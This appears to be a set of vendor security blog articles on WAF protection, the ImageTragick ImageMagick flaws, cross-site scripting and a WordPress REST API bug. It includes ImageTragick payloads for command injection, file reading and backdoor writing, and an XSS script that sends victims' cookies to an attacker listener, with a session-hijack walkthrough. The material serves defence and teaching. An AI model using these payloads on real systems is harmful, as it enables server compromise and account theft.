The BIG-IP Application Security Manager (ASM) is a Web Application Firewall (WAF) that protects your web applications from attacks like the ones listed in the OWASP top ten. While it's true that code should always be developed in a secure manner, those of us who live in the real world understand that we can't rely on the hope of secure coding practices to protect our critical information all the time. That's why you need a WAF. In the case of the very vulnerable "Hack-it-yourself auction" site, a WAF will protect the web application when it cannot protect itself. In the case of a SQL injection, a typical network firewall would never have blocked that attack because it was, in fact, a valid HTTP request on an open port (80, in this case). However, a WAF will inspect the HTTP request, notice that something isn't quite right, and block it before it ever has a chance to do any damage to your backend database. I created a security policy using the BIG-IP ASM and then turned it on to protect the auction site. The ASM now sits between the user and the web application, so every HTTP request will now flow through the ASM before it heads over to the website. The ASM will inspect each request and either let it through or block it based on the configuration of the security policy. I won't go into the details of how to build a policy in this article, but you can read more about how to build a policy here. After the security policy was created and activated, I tried the same SQL injection again. This time, instead of getting access to all those credit card numbers, I got a screen that looks like this (you can manipulate the screen to say whatever you want, by the way): Clearly the ASM is doing its job. Another cool thing about the ASM is that you can review the HTTP request logs to see exactly what an attacker is attempting to do when attacking your web application. The screenshot below shows some of the details of the SQL injection attempt. Notice the "Detected Keyword" portion of the screen...see anything familiar? Stay tuned for more exciting details on how the ASM can protect your web applications against other OWASP top ten (and more) vulnerabilities!

ImageTragick - ImageMagick Remote Code Execution Vulnerability
Abstract

Recently, a number of vulnerabilities have been found in a very popular library which is used to process image files. The vulnerabilities allow the attacker to execute code, move, read or delete remote files and issue outgoing requests from a web server. In certain scenarios, the vulnerability can even be exploited without authentication, making this a very powerful vulnerability and dangerous to unpatched web servers. This article will explain how those vulnerabilities can be mitigated using F5's BIG-IP with ASM provisioned.

ImageMagick

ImageMagick is a very popular piece of software; many programming languages have an interface for ImageMagick, allowing programmatic access to image processing and editing. It runs on Linux, Windows, Mac, iOS and many more. Quoting ImageMagick.org: The functionality of ImageMagick® is typically utilized from the command-line or you can use the features from programs written in your favorite language. Choose from these interfaces: G2F (Ada), MagickCore (C), MagickWand (C), ChMagick (Ch), ImageMagickObject (COM+), Magick++ (C++), JMagick (Java), L-Magick (Lisp), Lua (LuaJIT), NMagick (Neko/haXe), Magick.NET (.NET), PascalMagick (Pascal), PerlMagick (Perl), MagickWand for PHP (PHP), IMagick (PHP), PythonMagick (Python), RMagick (Ruby), or TclMagick (Tcl/TK). With a language interface, use ImageMagick to modify or create images dynamically and automagically.

MVG format

MVG stands for Magick Vector Graphics, and it is a modularized language for describing two-dimensional vector graphics using the ImageMagick engine. It can look like this:

push graphic-context
viewbox 0 0 400 400
image over 0,0 0,0 'label:@/home/files/nice_text'
pop graphic-context

In this example, the ImageMagick engine reads the text from the 'nice_text' file and draws a label with its contents over the picture.

Vulnerability - ImageTragick

The group of vulnerabilities was named ImageTragick because they exploit the ImageMagick package. The package contains several "coders" supporting instructions and commands for image manipulation. For instance, using the "label" instruction one can add free text from a file to an image. Several instructions were found to be vulnerable to different types of attack. More detailed information on each vulnerability can be found on the researchers' website: https://imagetragick.com/ We could distinguish those findings as three types of vulnerabilities:
- Shell Command Execution
- Application Abuse of Functionality
- Server Side Request Forgery

Shell Command Execution
CVE-2016-3714

By abusing this type of vulnerability, the attacker can cause the ImageMagick library to pass commands to the operating system shell, potentially ending up in complete system compromise. Considering ImageMagick's availability for all the popular operating systems and programming languages, this is a very dangerous vulnerability. An attacker can create a file in ImageMagick MVG or SVG format and upload it to a webserver which will process this file. Successfully performing this operation will cause ImageMagick to execute the command from the crafted file. Example:

fill 'url(https://example.com/image.jpg";|ls -la")'

The vulnerable code takes the URL and, without proper validation, concatenates it to the "wget" system command to fetch the image. The attacker is able to provide a URL ending with a double quote character and concatenate additional arbitrary system commands, such as the "ls -la" command in the example above or a "ping" command ("ping www.f5.com"). If the server is vulnerable, in the latter case it will contact www.f5.com.
Attackers can replace the "ping" command with something less naive, such as changing the password of the 'root' account or installing malware or a backdoor to gain control over the server.

ImageTragick Application Abuse

It was found that some coders include functionality that could be misused in order to perform the following operations on the server:
- CVE-2016-3715 – Delete file
- CVE-2016-3716 – File moving
- CVE-2016-3717 – Local File Read

The "EPHEMERAL" coder could be abused to delete files from the server just by providing a file name, as it deletes the file after reading it. Example:

image over 0,0 0,0 'ephemeral://critical.file'

The "label" instruction of the MVG coder could be abused to read the content of an arbitrary file on the server. Example:

image over 0,0 0,0 'label:@/etc/passwd'

However, CVE-2016-3716 is an even more interesting application abuse use case as, just by using the "read" and "write" directives of the MSL coder, an attacker could potentially compromise a remote server. In the full attack scenario, the attacker will upload an "image" file containing PHP code with a valid image extension, say "image.gif".

<?php
phpinfo(); //Show all information, defaults to INFO_ALL
?>
<!-- image.gif that will be renamed to backdoor.php -->

The next step will be uploading an MSL file with the "read" directive, which will read the content of the previously uploaded "image" file, and the "write" directive, which will write this content to a web-accessible directory while renaming the file to have a PHP extension to make it executable. Example:

<?xml version="1.0" encoding="UTF-8"?>
<image>
  <read filename="/tmp/image.gif" />
  <write filename="/var/www/shell.php" />
</image>
<!-- script.msl -->

Finally, the attacker will upload another MVG file that will execute the previously uploaded MSL file using the "msl" pseudo protocol. Example:

image over 0,0 0,0 'msl:/files/script.msl'

This example uses the 'phpinfo()' function in the PHP backdoor file as a simple indication that the exploit worked; however, an attacker can replace this command with a webshell such as described in our previous posts.

Server Side Request Forgery

The same "url" directive used in the MVG/SVG format could also be abused to cause the server to send HTTP or FTP requests, for example to another server inside the server's internal network that is not accessible from the outside world, by providing a URL with an IP address of the internal network. This vulnerability is tracked as CVE-2016-3718.
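To illustrate the server side request forgery vector (a sketch modeled on the publicly posted ImageTragick proof-of-concept files; the internal address is a placeholder), an uploaded MVG file only needs to reference an internal URL for the server to issue the request on the attacker's behalf:

push graphic-context
viewbox 0 0 640 480
fill 'url(http://10.0.0.5/internal-only/)'
pop graphic-context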
Mitigation

It is possible to protect against the ImageTragick vulnerabilities using BIG-IP ASM. Using a WAF to "virtually patch" the application can be critical as a protection tool, especially before the patch for the backend code is available or has been deployed. Although the "Shell Command Execution" vulnerabilities are 0-day vulnerabilities, meaning a previously unknown attack vector, the post-exploitation follows the same pattern, attempting to smuggle and execute operating system commands on the attacked server, and will be mitigated by the existing "Command Execution" attack signatures. For instance, signature ID 200003041 ("ls" execution attempt) will spot an attacker who is trying to smuggle the "ls –la" system command while exploiting CVE-2016-3714. We have also released an Attack Signature Update to detect and mitigate the specific ImageMagick application abuse and server side request forgery vulnerabilities.

It is recommended to patch the vulnerabilities in the code and follow some basic remediation steps:
- Consider disabling the unsafe coders (a sample policy snippet is shown below)
- Consult the ImageMagick recommendation: http://www.imagemagick.org/discourse-server/viewtopic.php?t=29588
- The webserver should run with the lowest permissions
- Always patch the systems
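As an example of the first remediation step, the risky coders can be disabled in ImageMagick's policy.xml. A commonly published snippet looks like the following; verify the exact policy names against the ImageMagick documentation for the version you are running:

<policymap>
  <policy domain="coder" rights="none" pattern="EPHEMERAL" />
  <policy domain="coder" rights="none" pattern="URL" />
  <policy domain="coder" rights="none" pattern="HTTPS" />
  <policy domain="coder" rights="none" pattern="MVG" />
  <policy domain="coder" rights="none" pattern="MSL" />
</policymap>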
ImageTragick - The Tragick continues

Abstract

We keep talking about the fact that ASM is an effective tool for protecting against 0-day attacks. Two years ago we were able to detect Shellshock exploitation attempts by detecting the carried commands that Shellshock was used to execute. More details are here: Mitigating the Unknown.

ImageMagick

ImageMagick, a very popular image editing library, has a new vulnerability which allows code execution by abusing an incorrectly parsed file format. We already wrote about ImageMagick in June because there were multiple CVEs about mishandling of the MVG and SVG file formats, allowing abuse of ImageMagick-based software to create and delete files, move them, and run commands, only by abusing incomplete input validation in ImageMagick's file format. Sometime after the original CVEs, another CVE showed up, allowing an attacker to execute an arbitrary shell command using the pipe character ("|") at the start of the processed filename.

CVE-2016-5118

The CVE ID for the new vulnerability is CVE-2016-5118 and, just like the earlier CVE-2016-3714, it may allow the attacker to remotely smuggle and run shell commands on the server. Luckily for us, ASM is great at mitigating 0-day shell and code execution vectors and, therefore, nothing had to be reconfigured to keep our server safe from this attack. In this particular example, ASM detected the exploitation attempt using 3 ASM signatures:
- echo: sig_id 200003045
- cat: sig_id 200003065
- /usr: sig_id 200003060

Conclusion

I believe that we have not seen the last CVE for ImageMagick-based software, but ASM should be able to detect and block the exploitation attempts for the vulnerabilities that were already discovered and those which are yet to come. We will continue to follow the issue and update the signatures when needed.

Cross Site Scripting (XSS) Exploit Paths
Introduction

Web application threats continue to cause serious security issues for large corporations and small businesses alike. In 2016, even the smallest, local family businesses have a Web presence, and it is important to understand the potential attack surface in any web-facing asset in order to properly understand vulnerabilities, exploitability, and thus risk. The Open Web Application Security Project (OWASP) is a non-profit organization dedicated to ensuring the safety and security of web application software, and periodically releases a Top 10 list of common categories of web application security flaws. The current list is available at https://www.owasp.org/index.php/Top_10_2013-Top_10 (an updated list for 2016/2017 is currently in data call announcement), and is used by application developers, security professionals, software vendors and IT managers as a reference point for understanding the nature of web application security vulnerabilities. This article presents a detailed analysis of the OWASP security flaw A3: Cross-Site Scripting (XSS), including descriptions of the three broad types of XSS and possibilities for exploitation.

Cross Site Scripting (XSS)

Cross-Site Scripting (XSS) attacks are a type of web application injection attack in which malicious script is delivered to a client browser using the vulnerable web app as an intermediary. The general effect is that the client browser is tricked into performing actions not intended by the web application. The classic example of an XSS attack is to force the victim browser to throw an 'XSS!' or 'Alert!' popup, but actual exploitation can result in the theft of cookies or confidential data, download of malware, etc.

Persistent XSS

Persistent (or Stored) XSS refers to a condition where the malicious script can be stored persistently on the vulnerable system, such as in the form of a message board post. Any victim browsing the page containing the XSS script is an exploit target. This is a very serious vulnerability, as a public stored XSS vulnerability could result in many thousands of cookies stolen, drive-by malware downloads, etc. As a proof-of-concept for cookie theft on a simple message board application, consider the following: Here is our freshly-installed message board application. Users can post comments, admins can access the admin panel. Let's use the typical POC exercise to validate that the message board is vulnerable to XSS: Sure enough, it is: Just throwing a dialog box is kinda boring, so let's do something more interesting. I'm going to inject a persistent XSS script that will steal the cookies of anyone browsing the vulnerable page: Now I start a listener on my attacking box; this can be as simple as netcat, but it can be any webserver of your choosing (python SimpleHTTPServer is another nice option).

dsyme@kylie:~$ sudo nc -nvlp 81

And wait for someone – hopefully the site admin – to browse the page. The admin has logged in and browsed the page. Now, my listener catches the HTTP callout from my malicious script: And I have my stolen cookie PHPSESSID=lrft6d834uqtflqtqh5l56a5m4. Now I can use an intercepting proxy or cookie manager to impersonate admin. Using Burp: Or, using Cookie Manager for Firefox: Now I'm logged into the admin page: Access to a web application CMS is pretty close to pwn. From here I can persist my access by creating additional admin accounts (noisy), or upload a shell (web/php reverse) to get shell access to the victim server.
Bear in mind that using such techniques we could easily host malware on our webserver, and every victim visiting the page with stored XSS would get a drive-by download.

Non-Persistent XSS

Non-persistent (or reflected) XSS refers to a slightly different condition in which the malicious content (script) is immediately returned by a web application, be it through an error message, search result, or some other means that echoes some part of the request back to the client. Due to their non-persistent nature, the malicious code is not stored on the vulnerable webserver, and hence it is generally necessary to trick a victim into opening a malicious link in order to exploit a reflected XSS vulnerability. We'll use our good friend DVWA (Damn Vulnerable Web App) for this example. First, we'll validate that it is indeed vulnerable to a reflected XSS attack: It is. Note that this can be POC'd by using the web form, or by directly inserting code into the 'name' parameter in the URL. Let's make sure we can capture a cookie in a similar manner as before. Start a netcat listener on 192.168.178.136:81 (and yes, we could use a full-featured webserver for this to harvest many cookies), and inject the following into the 'name' parameter:

<SCRIPT>document.location='http://192.168.178.136:81/?'+document.cookie</SCRIPT>

We have a cookie, PHPSESSID=ikm95nv7u7dlihhlkjirehbiu2. Let's see if we can use it to login from the command line without using a browser:

$ curl -b "security=low;PHPSESSID=ikm95nv7u7dlihhlkjirehbiu2" --location "http://192.168.178.140/dvwa/" > login.html
dsyme@kylie:~$ egrep Username login.html
<div align="left"><em>Username:</em> admin<br /><em>Security Level:</em> low<br /><em>PHPIDS:</em> disabled</div>

Indeed we can. Now, of course, we just stole our own cookie here. In a real attack we'd want to steal the cookie of the actual site admin, and to do that, we'd need to trick him or her into clicking the following link:

http://192.168.178.140/dvwa/vulnerabilities/xss_r/?name=victim<SCRIPT>document.location='http://192.168.178.136:81/?'+document.cookie</SCRIPT>

Or, easily enough, put it into an HTML message like this. And now we need to get our victim to click the link. A spear phishing attack might be a good way. And again, we start our listener and wait. Of course, instead of stealing admin's cookies, we could host malware on a webserver somewhere, and distribute the malicious URL by phishing campaign, host it on a compromised website, distribute it through adware (there are many possibilities), and wait for drive-by downloads. The malicious links are often obfuscated using a URL-shortening service.

DOM-Based XSS

DOM-based XSS is an XSS attack in which the malicious payload is executed as a result of modification of the Document Object Model (DOM) environment of the victim browser. A key differentiator between DOM-based and traditional XSS attacks is that in DOM-based attacks the malicious code is not sent in the HTTP response from server to client. In some cases, suspicious activity may be detected in HTTP requests, but in many cases no malicious content is ever sent to or from the webserver. Usually, a DOM-based XSS vulnerability is introduced by poor input validation on a client-side script. A very nice demo of DOM-based XSS is presented at https://xss-doc.appspot.com/demo/3.
In the demo, the URL fragment (the portion of the URL after #, which is never sent to the server) serves as input to a client-side script – in this instance, telling the browser which tab to display. Unfortunately, the fragment data is passed to the client-side script in an unsafe fashion: viewing the source of the demo page, the function definition at line 8 and the related code at line 33 show how the fragment value is consumed. In this case we can pass a string to the URL fragment that we know will cause the function to error, e.g. "foo", and set an error condition. Reproducing the example from that page (with full credit to the author), it is possible to inject code into the error condition, causing an alert dialog. The same approach could be modified to steal cookies, and of course we could deface the site by injecting an image of our choosing from an external source.

There are other possible vectors for DOM-based XSS attacks, such as:
- Unsanitized URL or POST body parameters that are passed to the server but do not modify the HTTP response, and are instead stored in the DOM and used as input to a client-side script. An example is given at https://www.owasp.org/index.php/DOM_Based_XSS
- Interception of the HTTP response to include additional malicious scripts (or modify existing ones) for the client browser to execute. This could be done with a man-in-the-browser attack (malicious browser extensions), malware, or response-side interception using a web proxy.

Like reflected XSS, exploitation is often accomplished by fooling a user into clicking a malicious link; DOM-based XSS is typically a client-side attack. The only circumstance under which server-side defences (such as mod_security, IDS/IPS or a WAF) are able to prevent DOM-based XSS is when the malicious script is sent from client to server, which is not usually the case. As more web applications rely on client-side components (such as periodic AJAX calls for updates), DOM-based XSS vulnerabilities are on the increase – an estimated 10% of the Alexa top 10k domains contained DOM-based XSS vulnerabilities according to Ben Stock, Sebastian Lekies and Martin Johns (https://www.blackhat.com/docs/asia-15/materials/asia-15-Johns-Client-Side-Protection-Against-DOM-Based-XSS-Done-Right-(tm).pdf).

Preventing XSS

XSS vulnerabilities exist due to a lack of input validation, whether on the client or the server side. Secure coding practices, regular code review, and white-box penetration testing are the best ways to prevent XSS in a web application, because they tackle the problem at source. OWASP documents a detailed list of rules for XSS prevention at https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet, and there are many other resources online on the topic. However, for many (most?) businesses it may not be possible to conduct code reviews or commit development effort to fixing vulnerabilities identified in penetration tests. In most cases, XSS can be effectively mitigated by deploying a Web Application Firewall (WAF).
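Before turning to WAF-based controls, here is a rough sketch of what tackling the problem at source looks like. It is illustrative only (in production, use a maintained encoding library and follow the OWASP cheat sheet linked above): untrusted values are encoded for the context they are rendered into before being echoed back to the browser.

// Minimal HTML-entity encoder for untrusted data rendered into HTML body context.
// Encoding rules differ per output context (attribute, JavaScript, URL, CSS),
// which is why a vetted library is preferable to hand-rolled code like this.
function encodeForHtml(untrusted) {
  return String(untrusted)
    .replace(/&/g, '&amp;')   // replace & first so later entities aren't double-encoded
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#x27;');
}
// Hypothetical usage in an Express-style handler:
// res.send('<p>Results for ' + encodeForHtml(req.query.name) + '</p>');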
Typical mechanisms for XSS prevention with a WAF are:
- Alerting on known XSS attack signatures
- Preventing input of <script> tags to the application unless specifically allowed (rare)
- Preventing input of '<' and '>' characters in web forms
- Multiple URL decoding to defeat bypass attempts that use encoding
- Enforcement of value types in HTTP parameters
- Blocking non-alphanumeric characters where they are not permitted

Typical IPS appliances lack the HTTP intelligence to provide the same level of protection as a WAF. For example, while an IPS may block the <script> tag (if it is correctly configured to intercept SSL), it may not be able to handle the URL decoding required to catch obfuscated attacks.

F5 Silverline is a cloud-based WAF service that provides fast, native protection against XSS attacks. It can be an excellent option for production applications that contain XSS vulnerabilities, because modifying the application code to remove the vulnerability can be time-consuming and resource-intensive. Full details of blocked attacks (true positives) can be viewed in the Silverline portal, enabling application and network administrators to extract key data in order to profile attackers. Similarly, time-based histograms show blocked XSS campaigns over time; in one example, a serious XSS attack prevented by the Silverline WAF on September 1st stands out clearly. F5 Application Security Manager (ASM) can provide a similar level of protection in an on-premises deployment. It is of course highly recommended that any preventive control be tested – which typically means running an automated vulnerability scan (good) or a manual penetration test (better) against the application once the control is in place. As noted in the previous section, do not expect web-based defences such as a WAF to protect against DOM-based XSS, as most of those attack vectors never send malicious traffic to the server.

WordPress REST API Vulnerability: Violating Security's Rule Zero
It's an API economy. If you don't have an API, you're already behind. APIs are the fuel driving organizations' digital transformation. We've all heard something similar to these phrases in the past few years, and while they look like marketing, they taste like truth. APIs really are transforming organizations and have taken hold as the de facto method of integration - internally, externally, laterally, and vertically. APIs enable mobile apps and things, web apps and middleware to communicate, collaborate, and extricate digital gold (that's data, by the way). So when a vulnerability is discovered in an API, it turns heads, especially if it's easily exploitable (this one is) and affects a significant number of publicly accessible resources (it does).

#WordPress REST API vulnerability is already abused in defacement campaigns https://t.co/5i9pYKW4tH by @danielcid

If you're running WordPress version 4.7.0 or 4.7.1, you are vulnerable. Stop reading this and go patch it right now. If you can't for some reason and you've got a BIG-IP ASM, you can apply these rules right now to protect vulnerable sites. I'm not kidding. I'll wait right here.

Okay, now that we've got that out of the way, I want to talk about APIs and security for a moment, because there seem to be some general misunderstandings about REST APIs and security that this vulnerability happens to illustrate perfectly.

HTTP: The Foundation on which REST APIs are Built

REST stands for Representational State Transfer. Don't worry too much about what that means; what you really need to understand is that it's an architectural style. If you were going to list it alongside other methods of achieving the same thing (transfer of data between two endpoints), you might list RPC, CORBA, and SOAP. A REST API call is an HTTP request whose URI endpoint is typically indistinguishable from a web URI. The request looks the same. Really, which of these two URIs is a call to an API?

GET /w/thing/snowmobile/id
GET /a/thing/snowmobile/id

See what I mean? No difference from the outside. There is no standard that requires a REST API to carry some identifying attribute or HTTP header that distinguishes it from a traditional web request. The Content-Type suggested by the JSON specification is application/json, but like the Pirate Code, those are more guidelines than actual rules. Thus, one cannot rely solely on Content-Type to tell a REST API call apart from a standard HTTP request. In fact, good old x-www-form-urlencoded is often used to invoke API calls from clients. For example, here's an HTTP request to an Express-based API I'm working on (for fun, 'cause I still do that) using Postman:

GET /api/user/1 HTTP/1.1
Host: 192.168.0.57:8080
Content-Type: application/x-www-form-urlencoded
Cache-Control: no-cache
Postman-Token: 6d2247a1-9923-4774-6b86-7ba334bd497e

And here's one that does a POST, to send data to the API endpoint:

POST /api/login HTTP/1.1
Host: 192.168.0.57:8080
Content-Type: application/x-www-form-urlencoded
Cache-Control: no-cache
Postman-Token: 32a29369-5d9d-6952-7de6-8aa4782d694d

name=Webmistress&passwd=xxxx

Now, these are API calls, and I'm betting that you noticed a couple of things:
- The REST API uses HTTP verbs like GET, POST, PUT, and DELETE.
- The URI is – and hold on to your hats now – a standard HTTP URI.
- The Content-Type does not help us determine whether this is a request to an API or a traditional web app.
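The server side of those two requests isn't shown in the article, so purely as an illustration (route paths and field names are taken from the requests above; everything else is an assumption), a minimal Express app that would accept them might look like this:

// Hypothetical Express app matching the Postman requests above; not the
// author's actual application.
const express = require('express');
const app = express();
app.use(express.urlencoded({ extended: false })); // parse x-www-form-urlencoded bodies

// GET /api/user/1 -- the :id path segment arrives as an untrusted string.
app.get('/api/user/:id', (req, res) => {
  res.json({ id: req.params.id });
});

// POST /api/login -- name and passwd come from the form-encoded body.
app.post('/api/login', (req, res) => {
  res.json({ user: req.body.name });
});

app.listen(8080);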
The first two points in that list are really important, because this basic foundation is what lets us breathe (a little) easier when it comes to securing APIs: we already know a whole lot about HTTP and the myriad ways in which it can be exploited. REST has become the de facto standard for communication because it is far simpler than its predecessors and relies solely on well-understood protocols and platforms, primarily HTTP. Building a REST API, then, means using HTTP to define a set of interfaces through which mobile apps, things, and web apps communicate. These interfaces, in aggregate, comprise an API, and basically they are a set of URI endpoints invoked via HTTP and acted on by a server-side application*. The fact that the architectural design is REST, and that it's an API, is irrelevant. The same code could have been written to support a traditional web-based system, because the problem isn't with the API or with REST; it's with the code that processes the input provided.

The WordPress vulnerability is not a vulnerability in its API per se, but in the way the API implementation handles standard, well-understood HTTP mechanisms. API implementations are often built on frameworks (like Express, can you tell I'm a fan?) that take the tedium out of splitting apart the URI and distilling the paths into "routes" that are then used to call the appropriate function. This code is also responsible for grabbing the query parameters (everything after the ? in a URI, including the key-value pairs) and stuffing them into variables that are used to do things like update databases, retrieve forum posts, and insert new content into the system. In this case, the back-end code for the API improperly handles those variables (including some poorly considered authorization logic), failing to properly validate and sanitize them.

In Dungeons and Dragons we have the concept of "Rule Zero", and it comes before every other rule out there. It is foundational. There is a similar Rule Zero in security, and it is this: THOU SHALT NOT TRUST USER INPUT. EVER. It is Rule Zero that was violated here, and that violation is what introduced this vulnerability into WordPress. You can certainly dig into the details and walk through the code (I like the type-casting logic that really makes this vulnerability work, and the lazy sanitization attempt), but the point is that REST API security relies heavily on the same well-understood web security long preached by OWASP and every other security vendor out there. In fact, one could say it starts with strong, basic web security, the foundation of which is built upon Rule Zero.

Yes, there are other security concerns with APIs, and REST introduces some of them because it eschews state; that means it requires a more active or external means of authentication and authorization. Many security folks are still getting up to speed on JSON, as are many of the security services inserted into the data path between endpoints to inspect, scan, and scrub app-layer data. But if you're trying to figure out where to start securing APIs, one of the best places is back at the beginning: laying down a strong set of secure coding practices that begins with Security's Rule Zero.
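To make Rule Zero concrete, here is a deliberately simple, hypothetical hardening of the /api/user/:id route sketched earlier (an illustration of the principle, not WordPress's actual fix): every value taken from the request is checked against a strict whitelist before it is used, instead of being loosely coerced into the type the code hopes it is.

// Hypothetical illustration of Rule Zero: validate before you trust.
app.get('/api/user/:id', (req, res) => {
  const id = req.params.id;
  // Accept only a plain positive integer; values like '10abc' (the kind of
  // input that loose type-casting would happily swallow) are rejected outright.
  if (!/^[1-9][0-9]*$/.test(id)) {
    return res.status(400).json({ error: 'invalid id' });
  }
  res.json({ id: Number(id) });
});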
* Increasingly, server-side applications are microservices, and in the case of APIs, serverless (Function as a Service) is also gaining traction. And still, they rely on endpoint invocation via an HTTP URI. Just sayin'.

The more things change, the more they stay the same.